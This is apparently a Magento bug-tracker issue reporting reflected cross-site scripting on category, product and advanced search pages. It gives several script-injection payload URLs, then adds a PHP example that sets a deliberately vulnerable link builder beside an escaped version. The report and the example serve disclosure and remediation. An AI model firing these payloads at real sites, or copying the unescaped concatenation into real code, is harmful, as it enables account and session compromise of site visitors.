Issue #28548 / XSS found in category and product detail pages

Posted: 2012-12-18 03:39:20
Category: Categories
Version: 1.6.2.0
Priority: high
Status: closed
Reported By: kay

Last week we started a pentest of our Magento installation and found XSS problems on every category and detail page.
Example:
<a href="?id=37&'"--></style></script><script>netsparker(0x000311)</script>=&order=price&dir=asc">
OR
in URL: ?nsextt='"--></style></script><script>alert(0x000379)</script>

SEARCH has this problem too:
catalogsearch/advanced/result/?cat=3&description=3&name='"--></style></script><script>alert(0x000700)</script>&price[from]=&price[to]=&search=3&short_description=3&sku=3&price[from]=3&price[to]=3


and some form elements do not have autocomplete="off"; maybe this can be a problem too.

best regards,
kay
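The report's payloads all follow one pattern: a value from the request query string is written back into a category page's link or form markup without escaping, so a quote and a closing tag in the input end the attribute and the element and the rest becomes live markup. The following is an added illustration of that failure mode beside the fix, not code from the report or from Magento's code base. Function names are hypothetical and the sample query string is constructed; it assumes plain PHP with no framework.

```php
<?php
// Added example, not code from the report or from Magento's code base.
// Reproduces the failure pattern the report describes: a request query string
// reflected into a sort link's href without escaping, beside a hardened
// version. Function names are hypothetical; the sample query is constructed.

declare(strict_types=1);

// Constructed query string in the spirit of the report's payloads
// (a quote, then markup that closes the attribute and the tag).
const SAMPLE_QUERY = 'id=37&\'"--></style></script><script>alert(1)</script>=&order=price&dir=asc';

// Vulnerable pattern: the raw query string is concatenated into an attribute
// value. The '"' in the input ends the href attribute, '>' ends the <a> tag,
// and the injected <script> element becomes live markup in the page.
function buildSortLinkUnsafe(string $rawQuery): string
{
    return '<a href="?' . $rawQuery . '&order=name">Sort by name</a>';
}

// Hardened pattern, two layers:
//  1. Rebuild the query from parsed parameters with http_build_query(), which
//     percent-encodes every key and value, so quotes and angle brackets can
//     never appear literally in the URL.
//  2. Escape the result for the HTML attribute context with htmlspecialchars()
//     and ENT_QUOTES, so both quote styles and '&' are entity-encoded.
function buildSortLinkSafe(string $rawQuery): string
{
    parse_str($rawQuery, $params);
    $params['order'] = 'name';
    $query = http_build_query($params);
    $attr  = htmlspecialchars($query, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="?' . $attr . '">Sort by name</a>';
}

// Review check: does the rendered markup still contain a live <script> tag?
function containsRawScriptTag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

foreach (['unsafe' => buildSortLinkUnsafe(SAMPLE_QUERY),
          'safe'   => buildSortLinkSafe(SAMPLE_QUERY)] as $label => $html) {
    printf("%-6s live script tag: %s\n%s\n\n",
        $label, containsRawScriptTag($html) ? 'yes' : 'no', $html);
}
```

The single-quote case matters as much as the double-quote one, because the payload in the report starts with `'`; escaping with ENT_QUOTES covers templates that use either quoting style for attributes. Encoding each parameter when the URL is rebuilt, rather than only escaping the final string, also stops the injected text from surviving as a separate query key that a later template might reflect again. Magento 1 ships an escapeHtml() helper on its core helper for the attribute-escaping step, so the fix in a template is to route every reflected request value through it rather than echoing it raw.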
